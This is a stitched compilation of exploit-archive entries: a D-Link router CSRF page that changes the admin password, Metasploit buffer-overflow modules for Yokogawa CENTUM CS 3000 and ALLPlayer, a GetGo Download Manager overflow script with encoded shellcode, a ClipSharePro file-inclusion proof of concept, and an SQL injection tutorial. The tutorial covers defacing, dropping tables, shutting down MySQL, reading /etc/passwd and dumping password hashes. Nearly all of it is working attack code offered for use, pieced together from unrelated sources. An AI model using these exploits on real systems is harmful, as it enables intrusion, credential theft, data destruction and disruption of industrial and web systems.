actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket?=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d= ----------------------------------------------------------------------------------------------------------- ########################################################################################################### ########################################################################################################### Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners. A thanks to the developers who have responded relatively quickly. Cheers! //sToRm source

#################################################################################### # Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00 CSRF Vulnerability # Google Dork: N/A # Date: 20/03/2014 # Exploit Author: Dhruv Shah # Vendor Homepage: http://www.dlink.com/us/en/home-solutions/connect/routers/dir-600l-wireless-n-150-home-cloud-router # Software Link: N/A # Hardware Version:E4 # Firmware Version:5.10 # Tested on: Router Web Server # CVE : N/A ################################################################################### Cross Site Request Forgery This Modem's Web Application , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. The Modems's Application not using any security token to prevent it against CSRF. You can manipulate any userdata. PoC and Exploit to change user password: In the POC the IP address in the POST is the modems IP address. <html> <body> <form id ="poc" action="http://192.168.0.1/goform/formSetPassword" method="POST"> <input type="hidden" name="settingsChanged" value="1" /> <input type="hidden" name="config.login_name" value="admin" /> <input type="hidden" name="config.password" value="YWRtaW4A" /> <input type="hidden" name="config.web_server_allow_graphics_auth" value="false" /> <input type="hidden" name="config.web_server_allow_wan_http" value="false" /> <input type="hidden" name="config.web_server_wan_port_http" value="8080" /> <input type="hidden" name="config.wan_web_ingress_filter_name" value="" /> <input type="hidden" name="wan_ingress_filter_details" value="" /> </form> </body> <script type="text/javascript"> document.getElementById("poc").submit(); </script> </html> ______________________ *Dhruv Shah* *aka Snypter* Blogger | Researcher | Consultant | Writer Youtube <http://www.youtube.com/snypter> | Facebook<http://www.facebook.com/dhruvshahs>| Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> | Twitter<https://twitter.com/Snypter>| Blog <http://security-geek.in/blog/> source

Toate parolele vor fi afisate in clear text.

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability exists in the service BKHOdeq.exe when handling specially crafted packets. This module has been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows 2003 SP2. }, 'Author' => [ 'juan vazquez', 'Redsadic <julian.vilas[at]gmail.com>' ], 'References' => [ [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ], [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ] ], 'Payload' => { 'Space' => 6000, 'DisableNops' => true, 'BadChars' => ":\r\n" }, 'Platform' => 'win', 'Targets' => [ [ 'Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]', { 'Ret' => 0x0042068e, # stackpivot from 2488 BKHOdeq.exe # ADD ESP,9B8 # RETN 'Offset' => 8660, 'StackPivotAdjustment' => 108 } ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 10 }, 'DisclosureDate' => 'Mar 10 2014', 'DefaultTarget' => 0)) register_options( [ # Required for EIP offset Opt::RPORT(20171) ], self.class) end def check # It forces an huge allocation, which should fail, # and return back an error answer from the server # while parsing the packet header. pkt = build_pkt(0xffffffff) res = send_pkt(pkt) if valid_response?(res) return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def exploit my_payload = payload.encoded rop_chain = create_rop_chain data = rand_text(target['StackPivotAdjustment']) data << rop_chain data << stack_adjust data << my_payload data << rand_text(target['Offset'] - data.length) data << generate_seh_record(target.ret) pkt = build_pkt(data.length, data) print_status("Trying target #{target.name}, sending #{pkt.length} bytes...") connect sock.put(pkt) disconnect end def build_pkt(data_length, data = "") header = rand_text(4) # iMark header << [data_length].pack("N") # Data length header << rand_text(4) # NumSet header << rand_text(2) # req header << rand_text(2) # Unknown pkt = header + data pkt end def send_pkt(data) connect sock.put(data) res = sock.get_once disconnect res end def valid_response?(data) return false unless data return false unless data.length == 4 return false unless result_code(data) == 0 true end def result_code(data) data.unpack("N").first end def stack_adjust adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset adjust end def create_rop_chain # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x63b27a60, # RET # padding on XP SP3 0x63b27a60, # RET # padding on XP SP3 0x63b27a5f, # POP EAX # RETN [libbkhMsg.dll] 0x61e761e0, # ptr to &VirtualAlloc() [IAT LibBKCCommon.dll] 0x61e641e4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [LibBKCCommon.dll] 0x00405522, # PUSH EAX # TEST EAX,C0330042 # POP ESI # ADD ESP,6D8 # RETN [BKHOdeq.exe] ].flatten.pack("V*") rop_gadgets << rand_text(1752) # Padding because of the "ADD ESP,6D8" instr rop_gadgets << [ 0x61e62aa4, # POP EBP # RETN [LibBKCCommon.dll] 0x61e648c0, # & push esp # ret [LibBKCCommon.dll] 0x66f3243f, # POP EBX # RETN [libBKBEqrp.dll] 0x00000001, # 0x00000001-> ebx 0x61e729dd, # POP EDX # MOV EAX,5E5FFFFF # RETN [LibBKCCommon.dll] 0x00001000, # 0x00001000-> edx 0x63a93f6f, # POP ECX # RETN [libbkhopx.dll] 0x00000040, # 0x00000040-> ecx 0x63ad1f6a, # POP EDI # RETN [libbkhOdeq.dll] 0x63dd3812, # RETN (ROP NOP) [libbkhCsSrch.dll] 0x61e60b4c, # POP EAX # RETN [LibBKCCommon.dll] 0x90909090, # nop 0x63ae5cc3, # PUSHAD # RETN [libbkhOdbh.dll] ].flatten.pack("V*") rop_gadgets end end source

MODIFYING SITE CONTENT: --------------------------------------------------- Sometime, u find the vulnerable site and get evrything to know but maybe admin login doesn't exist or it is accessible for certain IP range. Even in that context, u can use some kewl SQL commands for modifying the site content. I haven't seen much articles addressing this one so thought to include it here. Here, I will basically talk about few SQL commands u may use to change the site content. Therse commands are the workhorse of MySQL & are deadly when executed. ---->First let me list these commands: UPDATE: It is used to edit infos already in the db without deleting any rows. DELETE: It is used to delete the contents of one or more fields. DROP: It is used completely delete a table & all its associated data. Now, u could have figured out that these commands can be very desctructive if the site lets us to interact with db with no sanitization & proper permission. --------------------------------------------------------------------------------------------------------------------------------------------- Command Usage: ************** 1).UPDATE: Our vulnerable page is: http://www.site.com/article.php?id=5 Lets say the query is: SELECT title,data,author FROM article WHERE id=5 Though in reality, we don'By executing first query, we have set the title value as 'Hacked by x @ rstforums.com' in the table article while in second query, we have updated all three fields title, data, & author in the table article. Sometimes, u may want to change the specific page with id=5. For this u will do: http://www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*t know the query as above, we can find the table and column name as discussed earlier. So we would do: http://www.site.com/article.php?id=5 UPDATE article SET title='Hacked by x @ rstforums.com'/* or, u could alternatively do: http://www.site.com/article.php?id=5 UPDATE article SET title='Hacked by x @ rstforums.com',data='Ur site has zero security',author='Hacked by x @ rstforums.com'/* By executing first query, we have set the title value as 'Hacked by x @ rstforums.com' in the table article while in second query, we have updated all three fields title, data, & author in the table article. Sometimes, u may want to change the specific page with id=5. For this u will do: http://www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/* --------------------------------------------------------------------------------------------------------------------------------- 2).DELETE: As already stated, this deletes the content of one or more fields permanently from the db server. The syntax is: http://www.site.com/article.php?id=5 DELETE title,data,author FROM article/* or if u want to delete these fields from the id=5, u will do: http://www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/* ---------------------------------------------------------------------------------------------------------------------------------- 3).DROP: This is another deadly command u can use. With this, u can delete a table & all its associated data. For this, we make our URL as: http://www.site.com/article.php?id=5 DROP TABLE article/* This would delete table article & all its contents. ---------------------------------------------------------------------------------------------------------------------------------------- 4).SHUTTING DOWN MySQL SERVER: This is like DoSing the server as it will make the MySQL resources unavailable for the legitimate users or site visitors... For this, you will be using: SHUTDOWN WITH NOWAIT; So, you would craft a query which would execute the above command... For example, in my case, I would do the following: http://www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT; WOW! the MySQL server is down... This would prevent legitimate users & site visitors from using or viewing MySQL resources... ---------------------------------------------------------------------------------------------------------------------------------------------- 5).LOADFILE: MySQL has a function called load_file which you can use for your benefits again.. I have not seen much site where I could use this function... I think we should have MySQL root privilege for this.... Also, the magic quotes should be off for this.. But there is a way to get past the magic quotes... load_file can be used to load certain files of the server such as .htaccess, .htpasswd, etc.. & also password files like etc/passwd, etc.. Do something like below: http://www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/* But sometimes, you will have to hex the part & do something like below: http://www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427) where I have hexed... Now, if we are lucky, the scriptblock would echo the etc/passwd in the result.. ------------------------------------------------------------------------------------------------------------------------------- 6).MySQL ROOT: If the MySQL version is 5 or above, we might be able to gain MySQL root privilege which will again be helpful for us.. MySQL servers from version 5 have a table called mysql.user which contains the hashes & usernames for login... It is in the user table of the mysql database which ships with every installation of MySQL.. For this, you will do: http://www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/* Now you will get the usernames & hashes.. The hash is mysqlsha1... Quick note: JTR won't crack it.. But InsidePro Password Recovery Software has one to do it.. --------------------------------------------------------------------------------------------------------------------------------- 7).FINALIZING THE INJECTION TUTORIAL: Also for all sql injectors, think in a broad way.. & hexing is an important part in sql injection.. Sometimes the things that can't be done with normal ways can be done by using the hex part.. & be sure to try things with char(), hex() functions.. With these, you can bypass magic quotes on the server.. Again, within the UNION statement, you may try to use the XSS which would be sometimes helpful for you.. http://www.site.com/article.php?id=5 UNION ALL SELECT <scblockedript>alert("XSS via SQL injection");</scblockedript>,2/* Again in the above injection, you may require to hex up the javascriptblock part for bypassing the magic quotes.. Also for starters & those who know little things, you may setup a MySQL server & configure PHP for your apache server in your localhost where you can try different things.. In the command line interface of MySQL, try various commands enlisted below.. Try by modifying them... This would help you improve your MySQL command knowledge.. Also try to see how PHP codes interact with MySQL server.. For example, install some free forums like PHPBB, SMF,etc.. or some content management system as it would help you in two ways.. First, you would learn how the PHP interacts with MySQL.. You may check MySQL folder with what changes has occured after installing them. -------------------------------------------------------------------------------------------------------------------------------------- 8).MAJOR MySQL COMMANDS: Below, I would list some major MySQL commands that might help you a lot... Play with them in different ways by setting up a MySQL server in your computer.. ABORT -- abort the current transaction ALTER DATABASE -- change a database ALTER GROUP -- add users to a group or remove users from a group ALTER TABLE -- change the definition of a table ALTER TRIGGER -- change the definition of a trigger ALTER USER -- change a database user account ANALYZE -- collect statistics about a database BEGIN -- start a transaction block CHECKPOINT -- force a transaction log checkpoint CLOSE -- close a cursor CLUSTER -- cluster a table according to an index COMMENT -- define or change the comment of an object COMMIT -- commit the current transaction COPY -- copy data between files and tables CREATE AGGREGATE -- define a new aggregate function CREATE CAST -- define a user-defined cast CREATE CONSTRAINT TRIGGER -- define a new constraint trigger CREATE CONVERSION -- define a user-defined conversion CREATE DATABASE -- create a new database CREATE DOMAIN -- define a new domain CREATE FUNCTION -- define a new function CREATE GROUP -- define a new user group CREATE INDEX -- define a new index CREATE LANGUAGE -- define a new procedural language CREATE OPERATOR -- define a new operator CREATE OPERATOR CLASS -- define a new operator class for indexes CREATE RULE -- define a new rewrite rule CREATE SCHEMA -- define a new schema CREATE SEQUENCE -- define a new sequence generator CREATE TABLE -- define a new table CREATE TABLE AS -- create a new table from the results of a query CREATE TRIGGER -- define a new trigger CREATE TYPE -- define a new data type CREATE USER -- define a new database user account CREATE VIEW -- define a new view DEALLOCATE -- remove a prepared query DECLARE -- define a cursor DELETE -- delete rows of a table DROP AGGREGATE -- remove a user-defined aggregate function DROP CAST -- remove a user-defined cast DROP CONVERSION -- remove a user-defined conversion DROP DATABASE -- remove a database DROP DOMAIN -- remove a user-defined domain DROP FUNCTION -- remove a user-defined function DROP GROUP -- remove a user group DROP INDEX -- remove an index DROP LANGUAGE -- remove a user-defined procedural language DROP OPERATOR -- remove a user-defined operator DROP OPERATOR CLASS -- remove a user-defined operator class DROP RULE -- remove a rewrite rule DROP SCHEMA -- remove a schema DROP SEQUENCE -- remove a sequence DROP TABLE -- remove a table DROP TRIGGER -- remove a trigger DROP TYPE -- remove a user-defined data type DROP USER -- remove a database user account DROP VIEW -- remove a view END -- commit the current transaction EXECUTE -- execute a prepared query EXPLAIN -- show the execution plan of a statement FETCH -- retrieve rows from a table using a cursor GRANT -- define access privileges INSERT -- create new rows in a table LISTEN -- listen for a notification LOAD -- load or reload a shared library file LOCK -- explicitly lock a table MOVE -- position a cursor on a specified row of a table NOTIFY -- generate a notification PREPARE -- create a prepared query REINDEX -- rebuild corrupted indexes RESET -- restore the value of a run-time parameter to a default value REVOKE -- remove access privileges ROLLBACK -- abort the current transaction SELECT -- retrieve rows from a table or view SELECT INTO -- create a new table from the results of a query SET -- change a run-time parameter SET CONSTRAINTS -- set the constraint mode of the current transaction SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session SET TRANSACTION -- set the characteristics of the current transaction SHOW -- show the value of a run-time parameter START TRANSACTION -- start a transaction block TRUNCATE -- empty a table UNLISTEN -- stop listening for a notification UPDATE -- update rows of a table VACUUM -- garbage-collect and optionally analyze a database. // Tutorial gasit intr-un txt vechi, modificat, restructurat.

#!/usr/bin/python # Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution # Version: v4.9.0.1982 # CVE: CVE-2014-2206 # Date: 2014-03-09 # Author: Julien Ahrens (@MrTuxracer) # Homepage: http://www.rcesecurity.com # Software Link: http://www.getgosoft.com # Tested on: WinXP SP3-GER # # Howto / Notes: # SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled # from socket import * from time import sleep from struct import pack host = "192.168.0.1" port = 80 s = socket(AF_INET, SOCK_STREAM) s.bind((host, port)) s.listen(1) print "\n[+] Listening on %d ..." % port cl, addr = s.accept() print "[+] Connection accepted from %s" % addr[0] junk0 = "\x90" * 4107 nseh = "\x90\x90\xEB\x06" seh=pack('<L',0x00280b0b) # call dword ptr ss:[ebp+30] [SafeSEH Bypass] nops = "\x90" * 50 # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode = ("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" + "\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" + "\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" + "\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" + "\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" + "\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" + "\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" + "\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" + "\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" + "\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" + "\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" + "\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" + "\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" + "\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" + "\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" + "\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" + "\xa5\x59\x50") payload = junk0 + nseh + seh + nops + shellcode buffer = "HTTP/1.1 200 "+payload+"\r\n" print cl.recv(1000) cl.send(buffer) print "[+] Sending buffer: OK\n" sleep(3) cl.close() s.close() source

# Exploit Title : ClipSharePro <= 4.1 Local File Inclusion # Date : 2013/3/9 # Exploit Author : Saadat Ullah ? saadi_linux[at]rocketmail[dot]com # Software Link : http://www.clip-share.com # Author HomePage: http://security-geeks.blogspot.com # Tested on: Server : Apache/2.2.15 PHP/5.3.3 #Local File Inclusion ClipsharePro is a paid youtube clone script , suffers from Localfile Inclusion vulnerability through which attacker can include arbitrary file in webapp. LFI in ubr_link_upload.php Poc code if($MULTI_CONFIGS_ENABLED){ if(isset($_GET['config_file']) && strlen($_GET['config_file']) > 0){ $config_file = $_GET['config_file']; } else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); } } else{ $config_file = $DEFAULT_CONFIG; } // Load config file require $config_file; //including arbitrary file $_GET['config_file'] echo $config_file; The vulnerability can be exploited as.. http://localhost/clips/ClipSharePro/ubr_link_upload.php?config_file=/etc/passwd For sucessfully exploitation of this vulnerability you need $MULTI_CONFIGS_ENABLED to be 1 in the config file.. In ubr_ini.php $MULTI_CONFIGS_ENABLED = 1; --->This value should have to be 1 #Independent Pakistani Security Researcher source

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'ALLPlayer M3U Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in ALLPlayer 2.8.1, caused by a long string in a playlist entry. By persuading the victim to open a specially-crafted .M3U file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'metacom', # Vulnerability discovery 'Mike Czumak', # Original exploit 'Gabor Seljan' # Metasploit module ], 'References' => [ [ 'BID', '62926' ], [ 'BID', '63896' ], [ 'EDB', '28855' ], [ 'EDB', '29549' ], [ 'EDB', '29798' ], [ 'EDB', '32041' ], [ 'OSVDB', '98283' ], [ 'URL', 'http://www.allplayer.org/' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process' }, 'Platform' => 'win', 'Payload' => { 'DisableNops' => true, 'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f", 'Space' => 3060, 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX' } }, 'Targets' => [ [ ' ALLPlayer 2.8.1 / Windows 7 SP1', { 'Offset' => 301, 'Ret' => "\x50\x45", # POP POP RET from ALLPlayer.exe 'Nop' => "\x6e" # ADD BYTE PTR DS:[ESI],CH } ] ], 'Privileged' => false, 'DisclosureDate' => 'Oct 09 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']) ], self.class) end def exploit nop = target['Nop'] sploit = rand_text_alpha_upper(target['Offset']) sploit << "\x61\x50" # POPAD sploit << target.ret sploit << "\x53" # PUSH EBX sploit << nop sploit << "\x58" # POP EAX sploit << nop sploit << "\x05\x14\x11" # ADD EAX,0x11001400 sploit << nop sploit << "\x2d\x13\x11" # SUB EAX,0x11001300 sploit << nop sploit << "\x50" # PUSH EAX sploit << nop sploit << "\xc3" # RET sploit << nop * 109 sploit << payload.encoded sploit << rand_text_alpha_upper(10000) # Generate exception # Create the file print_status("Creating '#{datastore['FILENAME']}' file ...") file_create("http://" + sploit) end end source